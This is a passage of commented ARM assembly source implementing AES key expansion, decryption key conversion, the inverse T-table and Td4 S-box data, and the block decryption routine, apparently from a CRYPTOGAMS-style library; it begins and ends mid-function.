ldrb r0,[r12,#3] @ load input data in endian-neutral
ldrb r4,[r12,#2] @ manner...
ldrb r5,[r12,#1]
ldrb r6,[r12,#0]
orr r0,r0,r4,lsl#8
ldrb r1,[r12,#7]
orr r0,r0,r5,lsl#16
ldrb r4,[r12,#6]
orr r0,r0,r6,lsl#24
ldrb r5,[r12,#5]
ldrb r6,[r12,#4]
orr r1,r1,r4,lsl#8
ldrb r2,[r12,#11]
orr r1,r1,r5,lsl#16
ldrb r4,[r12,#10]
orr r1,r1,r6,lsl#24
ldrb r5,[r12,#9]
ldrb r6,[r12,#8]
orr r2,r2,r4,lsl#8
ldrb r3,[r12,#15]
orr r2,r2,r5,lsl#16
ldrb r4,[r12,#14]
orr r2,r2,r6,lsl#24
ldrb r5,[r12,#13]
ldrb r6,[r12,#12]
orr r3,r3,r4,lsl#8
str r0,[r11],#16
orr r3,r3,r5,lsl#16
str r1,[r11,#-12]
orr r3,r3,r6,lsl#24
str r2,[r11,#-8]
str r3,[r11,#-4]
#else
ldr r0,[r12,#0]
ldr r1,[r12,#4]
ldr r2,[r12,#8]
ldr r3,[r12,#12]
#ifdef __ARMEL__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
#endif
str r0,[r11],#16
str r1,[r11,#-12]
str r2,[r11,#-8]
str r3,[r11,#-4]
#endif
teq lr,#128
bne .Lnot128
@ --- AES-128: 10 rounds, 10 expansion iterations of 4 words each ---
mov r12,#10
str r12,[r11,#240-16] @ key->rounds = 10
add r6,r10,#256 @ rcon
mov lr,#255
.L128_loop:
@ temp = SubWord(RotWord(rk[3])) ^ rcon[i], then chain-xor into rk[4..7].
and r5,lr,r3,lsr#24
and r7,lr,r3,lsr#16
ldrb r5,[r10,r5]
and r8,lr,r3,lsr#8
ldrb r7,[r10,r7]
and r9,lr,r3
ldrb r8,[r10,r8]
orr r5,r5,r7,lsl#24
ldrb r9,[r10,r9]
orr r5,r5,r8,lsl#16
ldr r4,[r6],#4 @ rcon[i++]
orr r5,r5,r9,lsl#8
eor r5,r5,r4
eor r0,r0,r5 @ rk[4]=rk[0]^...
eor r1,r1,r0 @ rk[5]=rk[1]^rk[4]
str r0,[r11],#16
eor r2,r2,r1 @ rk[6]=rk[2]^rk[5]
str r1,[r11,#-12]
eor r3,r3,r2 @ rk[7]=rk[3]^rk[6]
str r2,[r11,#-8]
subs r12,r12,#1
str r3,[r11,#-4]
bne .L128_loop
sub r2,r11,#176
b .Ldone
.Lnot128:
@ --- AES-192/256: load key bytes 16..23 as rk[4],rk[5] first ---
#if __ARM_ARCH__<7
ldrb r8,[r12,#19]
ldrb r4,[r12,#18]
ldrb r5,[r12,#17]
ldrb r6,[r12,#16]
orr r8,r8,r4,lsl#8
ldrb r9,[r12,#23]
orr r8,r8,r5,lsl#16
ldrb r4,[r12,#22]
orr r8,r8,r6,lsl#24
ldrb r5,[r12,#21]
ldrb r6,[r12,#20]
orr r9,r9,r4,lsl#8
orr r9,r9,r5,lsl#16
str r8,[r11],#8
orr r9,r9,r6,lsl#24
str r9,[r11,#-4]
#else
ldr r8,[r12,#16]
ldr r9,[r12,#20]
#ifdef __ARMEL__
rev r8,r8
rev r9,r9
#endif
str r8,[r11],#8
str r9,[r11,#-4]
#endif
teq lr,#192
bne .Lnot192
@ --- AES-192: 12 rounds, 8 expansion iterations of 6 words each ---
mov r12,#12
str r12,[r11,#240-24] @ key->rounds = 12
add r6,r10,#256 @ rcon
mov lr,#255
mov r12,#8
.L192_loop:
and r5,lr,r9,lsr#24
and r7,lr,r9,lsr#16
ldrb r5,[r10,r5]
and r8,lr,r9,lsr#8
ldrb r7,[r10,r7]
and r9,lr,r9
ldrb r8,[r10,r8]
orr r5,r5,r7,lsl#24
ldrb r9,[r10,r9]
orr r5,r5,r8,lsl#16
ldr r4,[r6],#4 @ rcon[i++]
orr r5,r5,r9,lsl#8
eor r9,r5,r4
eor r0,r0,r9 @ rk[6]=rk[0]^...
eor r1,r1,r0 @ rk[7]=rk[1]^rk[6]
str r0,[r11],#24
eor r2,r2,r1 @ rk[8]=rk[2]^rk[7]
str r1,[r11,#-20]
eor r3,r3,r2 @ rk[9]=rk[3]^rk[8]
str r2,[r11,#-16]
subs r12,r12,#1
str r3,[r11,#-12]
#ifdef __thumb2__
itt eq @ Thumb2 thing, sanity check in ARM
#endif
subeq r2,r11,#216
beq .Ldone
ldr r7,[r11,#-32]
ldr r8,[r11,#-28]
eor r7,r7,r3 @ rk[10]=rk[4]^rk[9]
eor r9,r8,r7 @ rk[11]=rk[5]^rk[10]
str r7,[r11,#-8]
str r9,[r11,#-4]
b .L192_loop
.Lnot192:
@ --- AES-256: load key bytes 24..31 as rk[6],rk[7], then 7 iterations of
@ 8 words each; the second half of each iteration uses SubWord without
@ RotWord/rcon, per FIPS-197. ---
#if __ARM_ARCH__<7
ldrb r8,[r12,#27]
ldrb r4,[r12,#26]
ldrb r5,[r12,#25]
ldrb r6,[r12,#24]
orr r8,r8,r4,lsl#8
ldrb r9,[r12,#31]
orr r8,r8,r5,lsl#16
ldrb r4,[r12,#30]
orr r8,r8,r6,lsl#24
ldrb r5,[r12,#29]
ldrb r6,[r12,#28]
orr r9,r9,r4,lsl#8
orr r9,r9,r5,lsl#16
str r8,[r11],#8
orr r9,r9,r6,lsl#24
str r9,[r11,#-4]
#else
ldr r8,[r12,#24]
ldr r9,[r12,#28]
#ifdef __ARMEL__
rev r8,r8
rev r9,r9
#endif
str r8,[r11],#8
str r9,[r11,#-4]
#endif
mov r12,#14
str r12,[r11,#240-32] @ key->rounds = 14
add r6,r10,#256 @ rcon
mov lr,#255
mov r12,#7
.L256_loop:
and r5,lr,r9,lsr#24
and r7,lr,r9,lsr#16
ldrb r5,[r10,r5]
and r8,lr,r9,lsr#8
ldrb r7,[r10,r7]
and r9,lr,r9
ldrb r8,[r10,r8]
orr r5,r5,r7,lsl#24
ldrb r9,[r10,r9]
orr r5,r5,r8,lsl#16
ldr r4,[r6],#4 @ rcon[i++]
orr r5,r5,r9,lsl#8
eor r9,r5,r4
eor r0,r0,r9 @ rk[8]=rk[0]^...
eor r1,r1,r0 @ rk[9]=rk[1]^rk[8]
str r0,[r11],#32
eor r2,r2,r1 @ rk[10]=rk[2]^rk[9]
str r1,[r11,#-28]
eor r3,r3,r2 @ rk[11]=rk[3]^rk[10]
str r2,[r11,#-24]
subs r12,r12,#1
str r3,[r11,#-20]
#ifdef __thumb2__
itt eq @ Thumb2 thing, sanity check in ARM
#endif
subeq r2,r11,#256
beq .Ldone
and r5,lr,r3
and r7,lr,r3,lsr#8
ldrb r5,[r10,r5]
and r8,lr,r3,lsr#16
ldrb r7,[r10,r7]
and r9,lr,r3,lsr#24
ldrb r8,[r10,r8]
orr r5,r5,r7,lsl#8
ldrb r9,[r10,r9]
orr r5,r5,r8,lsl#16
ldr r4,[r11,#-48]
orr r5,r5,r9,lsl#24
ldr r7,[r11,#-44]
ldr r8,[r11,#-40]
eor r4,r4,r5 @ rk[12]=rk[4]^...
ldr r9,[r11,#-36]
eor r7,r7,r4 @ rk[13]=rk[5]^rk[12]
str r4,[r11,#-16]
eor r8,r8,r7 @ rk[14]=rk[6]^rk[13]
str r7,[r11,#-12]
eor r9,r9,r8 @ rk[15]=rk[7]^rk[14]
str r8,[r11,#-8]
str r9,[r11,#-4]
b .L256_loop
.align 2
.Ldone: mov r0,#0 @ success
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
.Labrt:
#if __ARM_ARCH__>=5
bx lr @ .word 0xe12fff1e
#else
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_AES_set_encrypt_key,.-cryptogams_AES_set_encrypt_key
@ int cryptogams_AES_set_decrypt_key(const unsigned char *userKey, int bits,
@                                    AES_KEY *key)
@ Builds a decryption key schedule: expands the encryption schedule into
@ 'key', then converts it in place via _armv4_AES_set_enc2dec_key.
@ Returns 0 on success; propagates -1 from the expansion on bad arguments.
.globl cryptogams_AES_set_decrypt_key
.type cryptogams_AES_set_decrypt_key,%function
.align 5
cryptogams_AES_set_decrypt_key:
str lr,[sp,#-4]! @ push lr
bl _armv4_AES_set_encrypt_key
teq r0,#0 @ expansion failed?
ldr lr,[sp],#4 @ pop lr
bne .Labrt
mov r0,r2 @ AES_set_encrypt_key preserves r2,
mov r1,r2 @ which is AES_KEY *key
b _armv4_AES_set_enc2dec_key @ tail-call in-place conversion
.size cryptogams_AES_set_decrypt_key,.-cryptogams_AES_set_decrypt_key
@ void cryptogams_AES_set_enc2dec_key(const AES_KEY *inp,AES_KEY *out)
@
@ Converts an encryption key schedule into a decryption schedule:
@ 1. .Linv copies the schedule with round-key order reversed (swapping
@    16-byte blocks from both ends; 'inp' may equal 'out').
@ 2. .Lmix applies InvMixColumns to the (rounds-1)*4 inner round-key words
@    in place, using SIMD-within-a-register xtime: masks r7=0x80808080 and
@    r8=0x1b1b1b1b reduce all four bytes of a word at once (tp2/tp4/tp8).
@ Returns 0 in r0.
.globl cryptogams_AES_set_enc2dec_key
.type cryptogams_AES_set_enc2dec_key,%function
.align 5
cryptogams_AES_set_enc2dec_key:
_armv4_AES_set_enc2dec_key:
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
ldr r12,[r0,#240] @ r12 = rounds
mov r7,r0 @ input
add r8,r0,r12,lsl#4 @ r8 = last round key of input
mov r11,r1 @ output
add r10,r1,r12,lsl#4 @ r10 = last round key of output
str r12,[r1,#240] @ copy rounds count
.Linv: ldr r0,[r7],#16 @ swap 16-byte round keys end-for-end
ldr r1,[r7,#-12]
ldr r2,[r7,#-8]
ldr r3,[r7,#-4]
ldr r4,[r8],#-16
ldr r5,[r8,#16+4]
ldr r6,[r8,#16+8]
ldr r9,[r8,#16+12]
str r0,[r10],#-16
str r1,[r10,#16+4]
str r2,[r10,#16+8]
str r3,[r10,#16+12]
str r4,[r11],#16
str r5,[r11,#-12]
str r6,[r11,#-8]
str r9,[r11,#-4]
teq r7,r8 @ pointers met in the middle?
bne .Linv
ldr r0,[r7] @ copy the (unswapped) middle round key
ldr r1,[r7,#4]
ldr r2,[r7,#8]
ldr r3,[r7,#12]
str r0,[r11]
str r1,[r11,#4]
str r2,[r11,#8]
str r3,[r11,#12]
sub r11,r11,r12,lsl#3 @ rewind to start of output schedule
ldr r0,[r11,#16]! @ prefetch tp1
mov r7,#0x80
mov r8,#0x1b
orr r7,r7,#0x8000
orr r8,r8,#0x1b00
orr r7,r7,r7,lsl#16 @ r7 = 0x80808080 (high-bit mask per byte)
orr r8,r8,r8,lsl#16 @ r8 = 0x1b1b1b1b (AES reduction polynomial)
sub r12,r12,#1
mvn r9,r7 @ r9 = 0x7f7f7f7f
mov r12,r12,lsl#2 @ (rounds-1)*4
.Lmix: and r4,r0,r7
and r1,r0,r9
sub r4,r4,r4,lsr#7
and r4,r4,r8
eor r1,r4,r1,lsl#1 @ tp2
and r4,r1,r7
and r2,r1,r9
sub r4,r4,r4,lsr#7
and r4,r4,r8
eor r2,r4,r2,lsl#1 @ tp4
and r4,r2,r7
and r3,r2,r9
sub r4,r4,r4,lsr#7
and r4,r4,r8
eor r3,r4,r3,lsl#1 @ tp8
eor r4,r1,r2
eor r5,r0,r3 @ tp9
eor r4,r4,r3 @ tpe
eor r4,r4,r1,ror#24
eor r4,r4,r5,ror#24 @ ^= ROTATE(tpb=tp9^tp2,8)
eor r4,r4,r2,ror#16
eor r4,r4,r5,ror#16 @ ^= ROTATE(tpd=tp9^tp4,16)
eor r4,r4,r5,ror#8 @ ^= ROTATE(tp9,24)
ldr r0,[r11,#4] @ prefetch tp1
str r4,[r11],#4 @ store InvMixColumns(word)
subs r12,r12,#1
bne .Lmix
mov r0,#0 @ success
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_AES_set_enc2dec_key,.-cryptogams_AES_set_enc2dec_key
@ AES decryption lookup tables.
@ First 1024 bytes: a single 256-entry 32-bit T-table; the core rotates
@ each lookup (ror#8/16/24) to serve as Td0..Td3. It is followed at
@ offset 1024 by Td4[256], the inverse S-box as plain bytes, used by the
@ final decryption round ("add r10,r10,#1024" in the core).
.type AES_Td,%object
.align 5
AES_Td:
.word 0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96
.word 0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393
.word 0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25
.word 0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f
.word 0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1
.word 0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6
.word 0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da
.word 0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844
.word 0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd
.word 0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4
.word 0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45
.word 0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94
.word 0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7
.word 0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a
.word 0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5
.word 0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c
.word 0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1
.word 0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a
.word 0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75
.word 0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051
.word 0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46
.word 0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff
.word 0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77
.word 0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb
.word 0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000
.word 0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e
.word 0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927
.word 0x0a0fd964, 0x685ca621, 0x9b5b54d1, 0x24362e3a
.word 0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e
.word 0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16
.word 0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d
.word 0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8
.word 0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd
.word 0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34
.word 0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163
.word 0xd731dcca, 0x42638510, 0x13972240, 0x84c61120
.word 0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d
.word 0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0
.word 0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422
.word 0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef
.word 0x87494ec7, 0xd938d1c1, 0x8ccaa2fe, 0x98d40b36
.word 0xa6f581cf, 0xa57ade28, 0xdab78e26, 0x3fadbfa4
.word 0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662
.word 0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5
.word 0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3
.word 0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b
.word 0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8
.word 0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6
.word 0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6
.word 0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0
.word 0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815
.word 0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f
.word 0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df
.word 0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f
.word 0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e
.word 0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713
.word 0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89
.word 0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c
.word 0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf
.word 0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86
.word 0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f
.word 0x161dc372, 0xbce2250c, 0x283c498b, 0xff0d9541
.word 0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190
.word 0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742
@ Td4[256]
.byte 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38
.byte 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb
.byte 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87
.byte 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb
.byte 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d
.byte 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e
.byte 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2
.byte 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25
.byte 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16
.byte 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92
.byte 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda
.byte 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84
.byte 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a
.byte 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06
.byte 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02
.byte 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b
.byte 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea
.byte 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73
.byte 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85
.byte 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e
.byte 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89
.byte 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b
.byte 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20
.byte 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4
.byte 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31
.byte 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f
.byte 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d
.byte 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef
.byte 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0
.byte 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61
.byte 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26
.byte 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
.size AES_Td,.-AES_Td
@ void cryptogams_AES_decrypt_block(const unsigned char *in, unsigned char *out,
@ const AES_KEY *key) {
@
@ Public entry point: decrypt one 16-byte block with a decryption key
@ schedule (as produced by cryptogams_AES_set_decrypt_key).
@ AAPCS in:  r0 = in, r1 = out, r2 = key.
@ Mirrors cryptogams_AES_encrypt_block: r1 ('out') is pushed first below
@ and popped into r12 after the core routine for the store-back.
.globl cryptogams_AES_decrypt_block
.type cryptogams_AES_decrypt_block,%function
.align 5
cryptogams_AES_decrypt_block:
#ifndef __thumb2__
sub r3,pc,#8 @ cryptogams_AES_decrypt_block
#else
adr r3,.
#endif
stmdb sp!,{r1,r4-r12,lr} @ save 'out' plus callee-saved registers
#if defined(__thumb2__) || defined(__APPLE__)
adr r10,AES_Td
#else
sub r10,r3,#cryptogams_AES_decrypt_block-AES_Td @ Td
#endif
mov r12,r0 @ inp
mov r11,r2
#if __ARM_ARCH__<7
@ Pre-ARMv7: assemble big-endian state words byte-by-byte (any alignment,
@ either endianness).
ldrb r0,[r12,#3] @ load input data in endian-neutral
ldrb r4,[r12,#2] @ manner...
ldrb r5,[r12,#1]
ldrb r6,[r12,#0]
orr r0,r0,r4,lsl#8
ldrb r1,[r12,#7]
orr r0,r0,r5,lsl#16
ldrb r4,[r12,#6]
orr r0,r0,r6,lsl#24
ldrb r5,[r12,#5]
ldrb r6,[r12,#4]
orr r1,r1,r4,lsl#8
ldrb r2,[r12,#11]
orr r1,r1,r5,lsl#16
ldrb r4,[r12,#10]
orr r1,r1,r6,lsl#24
ldrb r5,[r12,#9]
ldrb r6,[r12,#8]
orr r2,r2,r4,lsl#8
ldrb r3,[r12,#15]
orr r2,r2,r5,lsl#16
ldrb r4,[r12,#14]
orr r2,r2,r6,lsl#24
ldrb r5,[r12,#13]
ldrb r6,[r12,#12]
orr r3,r3,r4,lsl#8
orr r3,r3,r5,lsl#16
orr r3,r3,r6,lsl#24
#else
ldr r0,[r12,#0]
ldr r1,[r12,#4]
ldr r2,[r12,#8]
ldr r3,[r12,#12]
#ifdef __ARMEL__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
#endif
#endif
bl _cryptogams_armv4_AES_decrypt_block
ldr r12,[sp],#4 @ pop out
#if __ARM_ARCH__>=7
#ifdef __ARMEL__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
#endif
str r0,[r12,#0]
str r1,[r12,#4]
str r2,[r12,#8]
str r3,[r12,#12]
#else
@ Pre-ARMv7 store path: emit the plaintext one byte at a time.
mov r4,r0,lsr#24 @ write output in endian-neutral
mov r5,r0,lsr#16 @ manner...
mov r6,r0,lsr#8
strb r4,[r12,#0]
strb r5,[r12,#1]
mov r4,r1,lsr#24
strb r6,[r12,#2]
mov r5,r1,lsr#16
strb r0,[r12,#3]
mov r6,r1,lsr#8
strb r4,[r12,#4]
strb r5,[r12,#5]
mov r4,r2,lsr#24
strb r6,[r12,#6]
mov r5,r2,lsr#16
strb r1,[r12,#7]
mov r6,r2,lsr#8
strb r4,[r12,#8]
strb r5,[r12,#9]
mov r4,r3,lsr#24
strb r6,[r12,#10]
mov r5,r3,lsr#16
strb r2,[r12,#11]
mov r6,r3,lsr#8
strb r4,[r12,#12]
strb r5,[r12,#13]
strb r6,[r12,#14]
strb r3,[r12,#15]
#endif
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_AES_decrypt_block,.-cryptogams_AES_decrypt_block
@ Internal AES decryption core.
@ In:   r0-r3 = ciphertext state as four big-endian 32-bit words
@       r10   = AES_Td (combined T-table), r11 = decryption key schedule
@ Out:  r0-r3 = plaintext state words; r11 advanced past the schedule
@ Clob: r4-r9, r12, lr, flags.
@ The single word table serves as Td0..Td3 via per-lookup rotations; the
@ final round uses the Td4 byte table at AES_Td+1024.
.type _cryptogams_armv4_AES_decrypt_block,%function
.align 2
_cryptogams_armv4_AES_decrypt_block:
str lr,[sp,#-4]! @ push lr
ldmia r11!,{r4,r5,r6,r7} @ round 0: AddRoundKey
eor r0,r0,r4
ldr r12,[r11,#240-16] @ r12 = key->rounds (10/12/14)
eor r1,r1,r5
eor r2,r2,r6
eor r3,r3,r7
sub r12,r12,#1 @ rounds-1 full table rounds; last round is special
mov lr,#255 @ byte-extraction mask
and r7,lr,r0,lsr#16
and r8,lr,r0,lsr#8
and r9,lr,r0
mov r0,r0,lsr#24
.Ldec_loop:
@ One full inverse round per iteration, mirroring .Lenc_loop with the
@ inverse-cipher byte selection pattern.
ldr r4,[r10,r7,lsl#2] @ Td1[s0>>16]
and r7,lr,r1 @ i0
ldr r5,[r10,r8,lsl#2] @ Td2[s0>>8]
and r8,lr,r1,lsr#16
ldr r6,[r10,r9,lsl#2] @ Td3[s0>>0]
and r9,lr,r1,lsr#8
ldr r0,[r10,r0,lsl#2] @ Td0[s0>>24]
mov r1,r1,lsr#24
ldr r7,[r10,r7,lsl#2] @ Td3[s1>>0]
ldr r8,[r10,r8,lsl#2] @ Td1[s1>>16]
ldr r9,[r10,r9,lsl#2] @ Td2[s1>>8]
eor r0,r0,r7,ror#24
ldr r1,[r10,r1,lsl#2] @ Td0[s1>>24]
and r7,lr,r2,lsr#8 @ i0
eor r5,r8,r5,ror#8
and r8,lr,r2 @ i1
eor r6,r9,r6,ror#8
and r9,lr,r2,lsr#16
ldr r7,[r10,r7,lsl#2] @ Td2[s2>>8]
eor r1,r1,r4,ror#8
ldr r8,[r10,r8,lsl#2] @ Td3[s2>>0]
mov r2,r2,lsr#24
ldr r9,[r10,r9,lsl#2] @ Td1[s2>>16]
eor r0,r0,r7,ror#16
ldr r2,[r10,r2,lsl#2] @ Td0[s2>>24]
and r7,lr,r3,lsr#16 @ i0
eor r1,r1,r8,ror#24
and r8,lr,r3,lsr#8 @ i1
eor r6,r9,r6,ror#8
and r9,lr,r3 @ i2
ldr r7,[r10,r7,lsl#2] @ Td1[s3>>16]
eor r2,r2,r5,ror#8
ldr r8,[r10,r8,lsl#2] @ Td2[s3>>8]
mov r3,r3,lsr#24
ldr r9,[r10,r9,lsl#2] @ Td3[s3>>0]
eor r0,r0,r7,ror#8
ldr r7,[r11],#16 @ next round key words, interleaved with eors
eor r1,r1,r8,ror#16
ldr r3,[r10,r3,lsl#2] @ Td0[s3>>24]
eor r2,r2,r9,ror#24
ldr r4,[r11,#-12]
eor r0,r0,r7
ldr r5,[r11,#-8]
eor r3,r3,r6,ror#8
ldr r6,[r11,#-4]
and r7,lr,r0,lsr#16
eor r1,r1,r4
and r8,lr,r0,lsr#8
eor r2,r2,r5
and r9,lr,r0
eor r3,r3,r6
mov r0,r0,lsr#24
subs r12,r12,#1
bne .Ldec_loop
@ Final round: InvSubBytes via the Td4 byte table at r10+1024 (indexed
@ without lsl), no InvMixColumns. The eight word loads below only touch
@ one word per 32-byte line to warm the Td4 cache lines.
add r10,r10,#1024
ldr r5,[r10,#0] @ prefetch Td4
ldr r6,[r10,#32]
ldr r4,[r10,#64]
ldr r5,[r10,#96]
ldr r6,[r10,#128]
ldr r4,[r10,#160]
ldr r5,[r10,#192]
ldr r6,[r10,#224]
ldrb r0,[r10,r0] @ Td4[s0>>24]
ldrb r4,[r10,r7] @ Td4[s0>>16]
and r7,lr,r1 @ i0
ldrb r5,[r10,r8] @ Td4[s0>>8]
and r8,lr,r1,lsr#16
ldrb r6,[r10,r9] @ Td4[s0>>0]
and r9,lr,r1,lsr#8
add r1,r10,r1,lsr#24
ldrb r7,[r10,r7] @ Td4[s1>>0]
ldrb r1,[r1] @ Td4[s1>>24]
ldrb r8,[r10,r8] @ Td4[s1>>16]
eor r0,r7,r0,lsl#24
ldrb r9,[r10,r9] @ Td4[s1>>8]
eor r1,r4,r1,lsl#8
and r7,lr,r2,lsr#8 @ i0
eor r5,r5,r8,lsl#8
and r8,lr,r2 @ i1
ldrb r7,[r10,r7] @ Td4[s2>>8]
eor r6,r6,r9,lsl#8
ldrb r8,[r10,r8] @ Td4[s2>>0]
and r9,lr,r2,lsr#16
add r2,r10,r2,lsr#24
ldrb r2,[r2] @ Td4[s2>>24]
eor r0,r0,r7,lsl#8
ldrb r9,[r10,r9] @ Td4[s2>>16]
eor r1,r8,r1,lsl#16
and r7,lr,r3,lsr#16 @ i0
eor r2,r5,r2,lsl#16
and r8,lr,r3,lsr#8 @ i1
ldrb r7,[r10,r7] @ Td4[s3>>16]
eor r6,r6,r9,lsl#16
ldrb r8,[r10,r8] @ Td4[s3>>8]
and r9,lr,r3 @ i2
add r3,r10,r3,lsr#24
ldrb r9,[r10,r9] @ Td4[s3>>0]
ldrb r3,[r3] @ Td4[s3>>24]
eor r0,r0,r7,lsl#16
ldr r7,[r11,#0] @ final AddRoundKey
eor r1,r1,r8,lsl#8
ldr r4,[r11,#4]
eor r2,r9,r2,lsl#8
ldr r5,[r11,#8]
eor r3,r6,r3,lsl#24
